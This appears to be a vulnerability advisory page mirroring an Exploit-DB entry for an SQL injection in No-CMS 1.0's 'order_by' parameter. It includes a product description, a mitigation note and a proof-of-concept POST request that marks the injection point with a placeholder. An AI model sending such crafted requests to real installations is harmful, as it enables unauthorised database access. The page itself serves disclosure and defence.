No-Cms 1.0 - 'order_by' SQL Injection

vendor:

No-CMS

by:

Loading Kura Kura

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: No-CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Win10/Kali Linux

2018

No-Cms 1.0 – ‘order_by’ SQL Injection

No-CMS is a CMS-framework. No-CMS is a basic and 'less-assumption' CMS with some default features such as user authorization (including third party authentication), menu, module and theme management. It is fully customizable and extensible, you can make your own module and your own themes. It provide freedom to make your very own CMS, which is not provided very well by any other CMS. The vulnerability is a SQL injection vulnerability in the 'order_by' parameter, which can be exploited by sending a specially crafted POST request with malicious SQL code in the 'order_by' parameter.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Exploit Title: No-Cms 1.0 - 'order_by' SQL Injection
# Date: 2018-11-28
# Exploit Author: Loading Kura Kura  
# Vendor Homepage: https://github.com/goFrendiAsgard/No-CMS
# Software Link: https://codeload.github.com/goFrendiAsgard/No-CMS/zip/master
# Tested on: Win10/Kali Linux
# Google Dork: n/a
# Version: n/a
# CVE : 

# No-CMS is a CMS-framework.
# No-CMS is a basic and "less-assumption" CMS with some default features such as 
# user authorization (including third party authentication), menu, module and theme management.
# It is fully customizable and extensible, you can make your own module and your own themes.
# It provide freedom to make your very own CMS, which is not provided very well by any other CMS.

# POC
#Sqli injection { order_by[0] }

POST /nocms/main/manage_privilege/index/export HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/nocms/main/manage_privilege
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Connection: close
Cookie: bb9865483ae270ceba27539501d10599=rf0at4ehbd1ttckd85skvf17ssq4dfh2; crud_page_a36781f1e31bde68770f40381aad7df6=1; per_page_a36781f1e31bde68770f40381aad7df6=25; hidden_ordering_a36781f1e31bde68770f40381aad7df6=asc; hidden_sorting_a36781f1e31bde68770f40381aad7df6=index; search_text_a36781f1e31bde68770f40381aad7df6=; search_field_a36781f1e31bde68770f40381aad7df6=; 3c158ec1144ba8bb0dd8a7ca03988b5c=e4p2j92lle03vpp6ccuv2c8dro86ebep; crud_page_710a7d8c82ae37e845c3da5df1073379=1; per_page_710a7d8c82ae37e845c3da5df1073379=25; hidden_ordering_710a7d8c82ae37e845c3da5df1073379=desc; hidden_sorting_710a7d8c82ae37e845c3da5df1073379=date; search_text_710a7d8c82ae37e845c3da5df1073379=dd; search_field_710a7d8c82ae37e845c3da5df1073379=sec0e67fc; __secret_code=d282ef263719ab842e05
Upgrade-Insecure-Requests: 1

search_text=&search_field=/**/&per_page=25&order_by[0]=[INJECT HERE]&order_by[1]=&page=1

=========================
Regards 
Loading Kura Kura
thanks To :
Siluman IWAK 
Siluman Cupatkai
Siluman TUMO 
dan kamu sayang :*